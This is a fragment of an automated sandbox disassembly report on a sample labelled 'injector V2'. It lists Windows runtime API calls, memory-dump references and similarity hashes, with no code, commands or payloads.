                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: Cpp_errorCurrentThreadThrow_std::_
                                                                                    • String ID:
                                                                                    • API String ID: 350343453-0
                                                                                    • Opcode ID: c960c888ec0ada73288eff0a99229961875fcb6ee31ef07f5748171a93e840e2
                                                                                    • Instruction ID: 76db081f534743f228345d7d76c80ba6a43ed030923616dc19454d5358ba4d39
                                                                                    • Opcode Fuzzy Hash: c960c888ec0ada73288eff0a99229961875fcb6ee31ef07f5748171a93e840e2
                                                                                    • Instruction Fuzzy Hash: DAF11B76E505504FEB404A7CC8A83DF2BE68B66334F2A172EDA745B7D2D62B440A8F44
                                                                                    APIs
                                                                                    • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004DC8CB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFindFirst
                                                                                    • String ID:
                                                                                    • API String ID: 1974802433-0
                                                                                    • Opcode ID: 2a2fa7dc88ff0aef6273a9da30a2bb8bbc5988335adb4e33a01c99f47b3516da
                                                                                    • Instruction ID: 64189fd60649195154ed58b3f198143f922151e4aef40f55bf3f860ddcc30306
                                                                                    • Opcode Fuzzy Hash: 2a2fa7dc88ff0aef6273a9da30a2bb8bbc5988335adb4e33a01c99f47b3516da
                                                                                    • Instruction Fuzzy Hash: A871F571C0511E6EDF21EF258CE9AAAB7B9EB05304F1441DBE00997341DB388E85DF58
                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004D5450
                                                                                    • IsDebuggerPresent.KERNEL32 ref: 004D551C
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004D553C
                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 004D5546
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                    • String ID:
                                                                                    • API String ID: 254469556-0
                                                                                    • Opcode ID: b3a8f74d7a41c8cc7bfedfd0bd8d51c4b6da8d396094b8330cc09d28649d3db9
                                                                                    • Instruction ID: 69f1da8a81cf862c4788b997ecd5a2a7e2fc54ae040378a7f27dd0f9955a80d8
                                                                                    • Opcode Fuzzy Hash: b3a8f74d7a41c8cc7bfedfd0bd8d51c4b6da8d396094b8330cc09d28649d3db9
                                                                                    • Instruction Fuzzy Hash: 13312B75D052189BDF11EF64D9897CDBBF8BF08304F1041AAE40DAB291EB745A85CF09
                                                                                    APIs
                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 004D7EC2
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 004D7ECC
                                                                                    • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 004D7ED9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                    • String ID:
                                                                                    • API String ID: 3906539128-0
                                                                                    • Opcode ID: b80ad8ec9427753bd19c43c749c1e7a6895e8777f1bc1cf1977f287834bf5835
                                                                                    • Instruction ID: 440284514adfe8866553d03c15c25954f9bf4edbf8558d3dedf6cbb6c5695892
                                                                                    • Opcode Fuzzy Hash: b80ad8ec9427753bd19c43c749c1e7a6895e8777f1bc1cf1977f287834bf5835
                                                                                    • Instruction Fuzzy Hash: AE31B3749012199BCB21DF25D889B8DBBB4BF08314F5041EAE41CA7291EB749F858F48
                                                                                    APIs
                                                                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 004D2437
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___std_exception_destroy
                                                                                    • String ID:
                                                                                    • API String ID: 4194217158-0
                                                                                    • Opcode ID: f734d1afb7f8e0a7ff887d1a83f765b1a5da56811bb99711aaa1b9d119f74d2e
                                                                                    • Instruction ID: e63710952b32d33ba5e55e4e23a0df3a109ca494a0adf727a7362407824678c2
                                                                                    • Opcode Fuzzy Hash: f734d1afb7f8e0a7ff887d1a83f765b1a5da56811bb99711aaa1b9d119f74d2e
                                                                                    • Instruction Fuzzy Hash: 91A26A66A555C44FEB024AB884B93DF6FE24B6B330F6A2755C6F06F2D3D54B000B9B60
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: -g}5
                                                                                    • API String ID: 0-4071012034
                                                                                    • Opcode ID: 635f9774df6186401970c7965cfb59a8e1abfbcf998ff9e11e87edb07f6da2cd
                                                                                    • Instruction ID: ab936381409acd0909d4fdf9ee9dfb0f3064716bf013c4d997512cc0b646daf9
                                                                                    • Opcode Fuzzy Hash: 635f9774df6186401970c7965cfb59a8e1abfbcf998ff9e11e87edb07f6da2cd
                                                                                    • Instruction Fuzzy Hash: 9A929AA6A556C45FEF024AB8D4A93DF6FF24B6B331F5E2B5686E01F2D3C507004A9B10
                                                                                    APIs
                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004E1F2D,?,?,00000008,?,?,004E1AFF,00000000), ref: 004E21FF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionRaise
                                                                                    • String ID:
                                                                                    • API String ID: 3997070919-0
                                                                                    • Opcode ID: d1ba89dc6da8e7e4e78df253c0ae073125c004ff85d9391a5e200201bc0cfba1
                                                                                    • Instruction ID: a45cc0b7ccb54bae993aec47de450bdc36727239c1e1e8f7bf3c44d7ce3909f7
                                                                                    • Opcode Fuzzy Hash: d1ba89dc6da8e7e4e78df253c0ae073125c004ff85d9391a5e200201bc0cfba1
                                                                                    • Instruction Fuzzy Hash: 9FB19E31110648DFD715CF29C58AB657BE0FF05325F298699E99ACF3A1C37ADA82CB04
                                                                                    APIs
                                                                                      • Part of subcall function 004DB807: RtlAllocateHeap.NTDLL(00000008,?,?,?,004DA057,00000001,00000364,?,00000005,000000FF,?,004D6E25,004E9D20,0000000C), ref: 004DB848
                                                                                    • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004DC8CB
                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 004DC9BF
                                                                                    • FindClose.KERNEL32(00000000), ref: 004DC9FE
                                                                                    • FindClose.KERNEL32(00000000), ref: 004DCA31
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$CloseFile$AllocateFirstHeapNext
                                                                                    • String ID:
                                                                                    • API String ID: 4087847297-0
                                                                                    • Opcode ID: 6b93817a6223a13e8ee9300d65a99d15c81bea71090dd1821ff8eae6d1fdb8a0
                                                                                    • Instruction ID: c9d4ebbc323f38cf4e9cdc3803bad973b0eb9f5d378b4d2733b8d2b229d57869
                                                                                    • Opcode Fuzzy Hash: 6b93817a6223a13e8ee9300d65a99d15c81bea71090dd1821ff8eae6d1fdb8a0
                                                                                    • Instruction Fuzzy Hash: 1951587590020AAFDB24AF699CE49BFB7A9DF45318F1441AFF40993301EB388D41DB68
                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 004D5216
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: FeaturePresentProcessor
                                                                                    • String ID:
                                                                                    • API String ID: 2325560087-0
                                                                                    • Opcode ID: 20dfe55428750ba7e024f9ff9cfdb2b2054ed714c73242d01f4b3b2b5b5893f8
                                                                                    • Instruction ID: ba4753fa85d8a366a92422bbfb5a77ad17cb6b879ccd6a3f44bf1cc14ff26f87
                                                                                    • Opcode Fuzzy Hash: 20dfe55428750ba7e024f9ff9cfdb2b2054ed714c73242d01f4b3b2b5b5893f8
                                                                                    • Instruction Fuzzy Hash: 9F516CB190164A8FDB14CF65D8D17AABBF0FB48310F24896BD415EB392D7B89900CF98
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: k#fz
                                                                                    • API String ID: 0-1948189604
                                                                                    • Opcode ID: d9fb44537cbe353c7a1e7b158219f8f33cd9fac01b672b5bb08337fd5f7a1026
                                                                                    • Instruction ID: c27ed7b6c373a8a587adb595d82927dd33c65f999c35c1e78c3bf39c9fc494ef
                                                                                    • Opcode Fuzzy Hash: d9fb44537cbe353c7a1e7b158219f8f33cd9fac01b672b5bb08337fd5f7a1026
                                                                                    • Instruction Fuzzy Hash: CAD14176E115188FCB50CFBDC94069DB7F2AB88730F2A8329E835FB2D4D63499058B84
                                                                                    APIs
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00015560), ref: 004D543D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID:
                                                                                    • API String ID: 3192549508-0
                                                                                    • Opcode ID: ffae36206052220f56330bc5b14dc5843909e638caf21aadbf2ccc943c7b1a9a
                                                                                    • Instruction ID: 985d0eb6ef256252217be44b44d02f908223c4c8e669ceae2c43a039780d35ff
                                                                                    • Opcode Fuzzy Hash: ffae36206052220f56330bc5b14dc5843909e638caf21aadbf2ccc943c7b1a9a
                                                                                    • Instruction Fuzzy Hash:
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapProcess
                                                                                    • String ID:
                                                                                    • API String ID: 54951025-0
                                                                                    • Opcode ID: 7c918076a996628877f688e5d337c7c13e45cbce31f1b2bd8945f992c838adf6
                                                                                    • Instruction ID: 41ac898edc0288edb1c68b1ca2c20d1541a554ebc6bf3b20e1c0d9211a465f5d
                                                                                    • Opcode Fuzzy Hash: 7c918076a996628877f688e5d337c7c13e45cbce31f1b2bd8945f992c838adf6
                                                                                    • Instruction Fuzzy Hash: F3A02430D01140CF47404F31DFC470D3FD577001C130040745400CC1F1D73044014705
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 276a9053c86eca07b34e3a4bdbf311ed3d32ebc9479304920c988944e0576a13
                                                                                    • Instruction ID: b23f0eec450c2ec287c6bcf2b5c8cf7ff31cf53e5f783db288fae85b7562c86c
                                                                                    • Opcode Fuzzy Hash: 276a9053c86eca07b34e3a4bdbf311ed3d32ebc9479304920c988944e0576a13
                                                                                    • Instruction Fuzzy Hash: B432C276E446844FEB018ABCC4A53DF6FF25B6B334F2A1719C5A46F3D6DA1B040A8B50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 296667ad6baf7cead013ff872e4ea799f9206f0cb96b2644d38c233396adc532
                                                                                    • Instruction ID: d5404ceabcfae8aca23b6f56c7adffe64797de6744d759f4d22487d2a14f3670
                                                                                    • Opcode Fuzzy Hash: 296667ad6baf7cead013ff872e4ea799f9206f0cb96b2644d38c233396adc532
                                                                                    • Instruction Fuzzy Hash: C302B177A916904FEF01497CC8B93DB1BE747A7735E2A2726CAB05B3E2C55B000E9B50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9d980925b010070aeb8fe46d29fbcb31dae336f194625c143b1a33cec6d10e20
                                                                                    • Instruction ID: 35d98e5432be27fa9ac82c70ec78496f8a9e7bbbdf5fa4b97bc6dd5fb31f9e70
                                                                                    • Opcode Fuzzy Hash: 9d980925b010070aeb8fe46d29fbcb31dae336f194625c143b1a33cec6d10e20
                                                                                    • Instruction Fuzzy Hash: 9EE11876A505504FDF00897CC4A87DF2BE2476A334F2A272AC9A4AF7D2D61F080E9B54
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5e34b40ed55dfb2feab314170ab10b3339afb6665abc1c31b9360fdc97e9809c
                                                                                    • Instruction ID: b7624307329c3536a0a9f011109dedbb51be0e718b43d4f8da83b33ada280871
                                                                                    • Opcode Fuzzy Hash: 5e34b40ed55dfb2feab314170ab10b3339afb6665abc1c31b9360fdc97e9809c
                                                                                    • Instruction Fuzzy Hash: CCD0923A645A58AFC311CF49E880D42F7B8FB8D670B154066EA0897B21C331FC11CBE0
                                                                                    APIs
                                                                                    • type_info::operator==.LIBVCRUNTIME ref: 004D91F2
                                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 004D9300
                                                                                    • CatchIt.LIBVCRUNTIME ref: 004D9351
                                                                                    • _UnwindNestedFrames.LIBCMT ref: 004D9452
                                                                                    • CallUnexpected.LIBVCRUNTIME ref: 004D946D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                    • String ID: 81N$@]M$csm$csm$csm
                                                                                    • API String ID: 4119006552-3581252686
                                                                                    • Opcode ID: dd78979c86ecee3d00d78fee746c3598e91d40bd3c1a3ccd100f2257f487cac1
                                                                                    • Instruction ID: 89c5baade081c99203d768e5c70df9b452572e8434443e881ca22178d8974cef
                                                                                    • Opcode Fuzzy Hash: dd78979c86ecee3d00d78fee746c3598e91d40bd3c1a3ccd100f2257f487cac1
                                                                                    • Instruction Fuzzy Hash: A1B18971800209EFCF14EFA5C8A19AEB7B5BF08314B14459FE805AB342D739DE52CB99
                                                                                    APIs
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 004D6167
                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 004D616F
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 004D61F8
                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 004D6223
